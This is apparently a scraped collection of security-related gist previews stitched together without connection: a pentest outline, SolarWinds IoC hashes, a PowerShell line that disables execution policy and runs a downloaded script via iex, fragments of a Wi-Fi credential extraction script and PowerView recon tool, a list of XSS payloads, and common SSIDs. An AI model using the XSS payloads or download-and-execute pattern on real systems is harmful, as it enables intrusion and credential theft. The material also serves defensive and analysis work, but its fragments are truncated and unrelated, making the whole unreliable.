- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
| // Solarwinds Orion Hashes of Known Malicious IoCs | |
| Sha256: 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 | |
| Sha1: 2f1a5a7411d015d01aaee4535835400191645023 | |
| Sha256: ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 | |
| Sha1: d130bd75645c2433f88ac03e73395fba172ef676 | |
| Sha256: 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 | |
| Sha1: 76640508b1e7759e548771a5359eaed353bf1eec | 
| Set-ExecutionPolicy Unrestricted; | |
| iex ((New-Object System.Net.WebClient).DownloadString('http://boxstarter.org/bootstrapper.ps1')); | |
| get-boxstarter -Force; | |
| Install-BoxstarterPackage -PackageName 'https://gist.githubusercontent.com/OALabs/afb619ce8778302c324373378abbaef5/raw/4006323180791f464ec0a8a838c7b681f42d238c/oalabs_x86vm.ps1'; | 
| Write-Host -NoNewline " " | |
| Write-Host -NoNewline " _______ _______ ___ _______ _______ _______ " | |
| Write-Host -NoNewline " | || _ || | | _ || _ || | " | |
| Write-Host -NoNewline " | _ || |_| || | | |_| || |_| || _____| " | |
| Write-Host -NoNewline " | | | || || | | || || |_____ " | |
| Write-Host -NoNewline " | |_| || || |___ | || _ | |_____ | " | |
| Write-Host -NoNewline " | || _ || || _ || |_| | _____| | " | |
| Write-Host -NoNewline " |_______||__| |__||_______||__| |__||_______||_______| " | |
| Write-Host -NoNewline " " | |
| Write-Host -NoNewline " " | 
| <?php | |
| /// MONITORR /// | |
| // https://github.com/monitorr/Monitorr | |
| /** | |
| * This script uses CURL to check if given HOST is serving a webpage. | |
| * If CURL fails, use a PING (pfsockopen) function to check if anything is listening at given URL | 
| #!/usr/bin/env python | |
| import getpass | |
| import json | |
| import requests | |
| import sys | |
| import urllib | |
| import boto3 | 
| #====================================# | |
| # Extract Wi-Fi Credentials # | |
| # greg . foss @ owasp . org # | |
| # v0.1 -- July, 2017 # | |
| #====================================# | |
| # Licensed under the MIT License | |
| <# | 
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set | 
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> | 
| ssid | |
| xfinitywifi | |
| linksys | |
| <no ssid> | |
| BTWiFi-with-FON | |
| NETGEAR | |
| Ziggo | |
| dlink | |
| BTWifi-X | |
| default |